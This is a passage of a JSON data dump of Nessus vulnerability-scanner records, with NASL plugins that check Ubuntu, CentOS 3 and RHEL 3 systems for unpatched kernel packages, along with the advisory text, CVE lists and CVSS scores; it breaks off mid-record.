value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-686-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-k8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-k8-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-amd64-xeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-686-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-amd64-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-amd64-k8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-amd64-k8-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6.8.1-6-amd64-xeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-patch-debian-2.6.8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-patch-ubuntu-2.6.10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-patch-ubuntu-2.6.12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-tree-2.6.10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-tree-2.6.12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-tree-2.6.8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04|5\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04 / 5.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-doc-2.6.8.1\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-6\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-6-386\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-6-686\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-6-686-smp\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-6-amd64-generic\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-6-amd64-k8\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-6-amd64-k8-smp\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-headers-2.6.8.1-6-amd64-xeon\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-6-386\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-6-686\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-6-686-smp\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-6-amd64-generic\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-6-amd64-k8\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-6-amd64-k8-smp\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-image-2.6.8.1-6-amd64-xeon\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-patch-debian-2.6.8.1\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-source-2.6.8.1\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"linux-tree-2.6.8.1\", pkgver:\"2.6.8.1-16.26\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-doc-2.6.10\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-headers-2.6.10-6\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-headers-2.6.10-6-386\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-headers-2.6.10-6-686\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-headers-2.6.10-6-686-smp\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-headers-2.6.10-6-amd64-generic\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-headers-2.6.10-6-amd64-k8\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-headers-2.6.10-6-amd64-k8-smp\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-headers-2.6.10-6-amd64-xeon\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-image-2.6.10-6-386\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-image-2.6.10-6-686\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-image-2.6.10-6-686-smp\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-image-2.6.10-6-amd64-generic\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-image-2.6.10-6-amd64-k8\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-image-2.6.10-6-amd64-k8-smp\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-image-2.6.10-6-amd64-xeon\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-patch-ubuntu-2.6.10\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-source-2.6.10\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"linux-tree-2.6.10\", pkgver:\"2.6.10-34.9\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-doc-2.6.12\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-headers-2.6.12-10\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-headers-2.6.12-10-386\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-headers-2.6.12-10-686\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-headers-2.6.12-10-686-smp\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-headers-2.6.12-10-amd64-generic\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-headers-2.6.12-10-amd64-k8\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-headers-2.6.12-10-amd64-k8-smp\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-headers-2.6.12-10-amd64-xeon\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-image-2.6.12-10-386\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-image-2.6.12-10-686\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-image-2.6.12-10-686-smp\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-image-2.6.12-10-amd64-generic\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-image-2.6.12-10-amd64-k8\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-image-2.6.12-10-amd64-k8-smp\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-image-2.6.12-10-amd64-xeon\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-patch-ubuntu-2.6.12\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-source-2.6.12\", pkgver:\"2.6.12-10.25\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"linux-tree-2.6.12\", pkgver:\"2.6.12-10.25\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-doc-2.6.10 / linux-doc-2.6.12 / linux-doc-2.6.8.1 / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:24:54", "description": "Updated kernel packages that fix several security issues in the Red\nHat Enterprise Linux 3 kernel are now available.\n\nThis security advisory has been rated as having important security\nimpact by the Red Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the security issues\ndescribed below :\n\n - a flaw in network IGMP processing that a allowed a\n remote user on the local network to cause a denial of\n service (disabling of multicast reports) if the system\n is running multicast applications (CVE-2002-2185,\n moderate)\n\n - a flaw in remap_page_range() with O_DIRECT writes that\n allowed a local user to cause a denial of service\n (crash) (CVE-2004-1057, important)\n\n - a flaw in exec() handling on some 64-bit architectures\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-2708, important)\n\n - a flaw in procfs handling during unloading of modules\n that allowed a local user to cause a denial of service\n or potentially gain privileges (CVE-2005-2709, moderate)\n\n - a flaw in IPv6 network UDP port hash table lookups that\n allowed a local user to cause a denial of service (hang)\n (CVE-2005-2973, important)\n\n - a flaw in 32-bit-compat handling of the TIOCGDEV ioctl\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3044, important)\n\n - a network buffer info leak using the orinoco driver that\n allowed a remote user to possibly view uninitialized\n data (CVE-2005-3180, important)\n\n - a flaw in IPv4 network TCP and UDP netfilter handling\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3275, important)\n\n - a flaw in the IPv6 flowlabel code that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-3806, important)\n\n - a flaw in network ICMP processing that allowed a local\n user to cause a denial of service (memory exhaustion)\n (CVE-2005-3848, important)\n\n - a flaw in file lease time-out handling that allowed a\n local user to cause a denial of service (log file\n overflow) (CVE-2005-3857, moderate)\n\n - a flaw in network IPv6 xfrm handling that allowed a\n local user to cause a denial of service (memory\n exhaustion) (CVE-2005-3858, important)\n\nAll Red Hat Enterprise Linux 3 users are advised to upgrade their\nkernels to the packages associated with their machine architecture and\nconfigurations as listed in this erratum.", "edition": 26, "published": "2006-07-03T00:00:00", "title": "CentOS 3 : kernel (CESA-2006:0140)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3858", "CVE-2005-3275", "CVE-2004-1057", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-3848", "CVE-2005-2709", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-2708", "CVE-2005-3857", "CVE-2002-2185"], "modified": "2006-07-03T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel-hugemem-unsupported", "p-cpe:/a:centos:centos:kernel-hugemem", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-smp", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-BOOT", "p-cpe:/a:centos:centos:kernel-smp-unsupported", "p-cpe:/a:centos:centos:kernel-source", "p-cpe:/a:centos:centos:kernel-unsupported", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2006-0140.NASL", "href": "https://www.tenable.com/plugins/nessus/21881", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0140 and \n# CentOS Errata and Security Advisory 2006:0140 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21881);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-2185\", \"CVE-2004-1057\", \"CVE-2005-2708\", \"CVE-2005-2709\", \"CVE-2005-2973\", \"CVE-2005-3044\", \"CVE-2005-3180\", \"CVE-2005-3275\", \"CVE-2005-3806\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\");\n script_bugtraq_id(14902);\n script_xref(name:\"RHSA\", value:\"2006:0140\");\n\n script_name(english:\"CentOS 3 : kernel (CESA-2006:0140)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix several security issues in the Red\nHat Enterprise Linux 3 kernel are now available.\n\nThis security advisory has been rated as having important security\nimpact by the Red Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the security issues\ndescribed below :\n\n - a flaw in network IGMP processing that a allowed a\n remote user on the local network to cause a denial of\n service (disabling of multicast reports) if the system\n is running multicast applications (CVE-2002-2185,\n moderate)\n\n - a flaw in remap_page_range() with O_DIRECT writes that\n allowed a local user to cause a denial of service\n (crash) (CVE-2004-1057, important)\n\n - a flaw in exec() handling on some 64-bit architectures\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-2708, important)\n\n - a flaw in procfs handling during unloading of modules\n that allowed a local user to cause a denial of service\n or potentially gain privileges (CVE-2005-2709, moderate)\n\n - a flaw in IPv6 network UDP port hash table lookups that\n allowed a local user to cause a denial of service (hang)\n (CVE-2005-2973, important)\n\n - a flaw in 32-bit-compat handling of the TIOCGDEV ioctl\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3044, important)\n\n - a network buffer info leak using the orinoco driver that\n allowed a remote user to possibly view uninitialized\n data (CVE-2005-3180, important)\n\n - a flaw in IPv4 network TCP and UDP netfilter handling\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3275, important)\n\n - a flaw in the IPv6 flowlabel code that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-3806, important)\n\n - a flaw in network ICMP processing that allowed a local\n user to cause a denial of service (memory exhaustion)\n (CVE-2005-3848, important)\n\n - a flaw in file lease time-out handling that allowed a\n local user to cause a denial of service (log file\n overflow) (CVE-2005-3857, moderate)\n\n - a flaw in network IPv6 xfrm handling that allowed a\n local user to cause a denial of service (memory\n exhaustion) (CVE-2005-3858, important)\n\nAll Red Hat Enterprise Linux 3 users are advised to upgrade their\nkernels to the packages associated with their machine architecture and\nconfigurations as listed in this erratum.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-January/012589.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?693a0367\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-January/012590.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1a7ff693\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-January/012593.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?325c1a7f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-BOOT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-hugemem-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-smp-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"kernel-2.4.21-37.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"kernel-BOOT-2.4.21-37.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"kernel-doc-2.4.21-37.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"kernel-hugemem-2.4.21-37.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"kernel-hugemem-unsupported-2.4.21-37.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"kernel-smp-2.4.21-37.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"kernel-smp-2.4.21-37.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"kernel-smp-unsupported-2.4.21-37.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"kernel-smp-unsupported-2.4.21-37.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"kernel-source-2.4.21-37.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"kernel-unsupported-2.4.21-37.0.1.EL\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-BOOT / kernel-doc / kernel-hugemem / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:05:34", "description": "Updated kernel packages that fix several security issues in the Red\nHat Enterprise Linux 3 kernel are now available.\n\nThis security advisory has been rated as having important security\nimpact by the Red Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the security issues\ndescribed below :\n\n - a flaw in network IGMP processing that a allowed a\n remote user on the local network to cause a denial of\n service (disabling of multicast reports) if the system\n is running multicast applications (CVE-2002-2185,\n moderate)\n\n - a flaw in remap_page_range() with O_DIRECT writes that\n allowed a local user to cause a denial of service\n (crash) (CVE-2004-1057, important)\n\n - a flaw in exec() handling on some 64-bit architectures\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-2708, important)\n\n - a flaw in procfs handling during unloading of modules\n that allowed a local user to cause a denial of service\n or potentially gain privileges (CVE-2005-2709, moderate)\n\n - a flaw in IPv6 network UDP port hash table lookups that\n allowed a local user to cause a denial of service (hang)\n (CVE-2005-2973, important)\n\n - a flaw in 32-bit-compat handling of the TIOCGDEV ioctl\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3044, important)\n\n - a network buffer info leak using the orinoco driver that\n allowed a remote user to possibly view uninitialized\n data (CVE-2005-3180, important)\n\n - a flaw in IPv4 network TCP and UDP netfilter handling\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3275, important)\n\n - a flaw in the IPv6 flowlabel code that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-3806, important)\n\n - a flaw in network ICMP processing that allowed a local\n user to cause a denial of service (memory exhaustion)\n (CVE-2005-3848, important)\n\n - a flaw in file lease time-out handling that allowed a\n local user to cause a denial of service (log file\n overflow) (CVE-2005-3857, moderate)\n\n - a flaw in network IPv6 xfrm handling that allowed a\n local user to cause a denial of service (memory\n exhaustion) (CVE-2005-3858, important)\n\nAll Red Hat Enterprise Linux 3 users are advised to upgrade their\nkernels to the packages associated with their machine architecture and\nconfigurations as listed in this erratum.", "edition": 27, "published": "2006-01-20T00:00:00", "title": "RHEL 3 : kernel (RHSA-2006:0140)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3858", "CVE-2005-3275", "CVE-2004-1057", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-3848", "CVE-2005-2709", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-2708", "CVE-2005-3857", "CVE-2002-2185"], "modified": "2006-01-20T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:kernel-BOOT", "p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-unsupported", "p-cpe:/a:redhat:enterprise_linux:kernel-unsupported", "p-cpe:/a:redhat:enterprise_linux:kernel-smp", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-source", "p-cpe:/a:redhat:enterprise_linux:kernel-smp-unsupported", "p-cpe:/a:redhat:enterprise_linux:kernel-hugemem", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2006-0140.NASL", "href": "https://www.tenable.com/plugins/nessus/20751", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0140. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20751);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2002-2185\", \"CVE-2004-1057\", \"CVE-2005-2708\", \"CVE-2005-2709\", \"CVE-2005-2973\", \"CVE-2005-3044\", \"CVE-2005-3180\", \"CVE-2005-3275\", \"CVE-2005-3806\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\");\n script_bugtraq_id(14902);\n script_xref(name:\"RHSA\", value:\"2006:0140\");\n\n script_name(english:\"RHEL 3 : kernel (RHSA-2006:0140)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix several security issues in the Red\nHat Enterprise Linux 3 kernel are now available.\n\nThis security advisory has been rated as having important security\nimpact by the Red Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the security issues\ndescribed below :\n\n - a flaw in 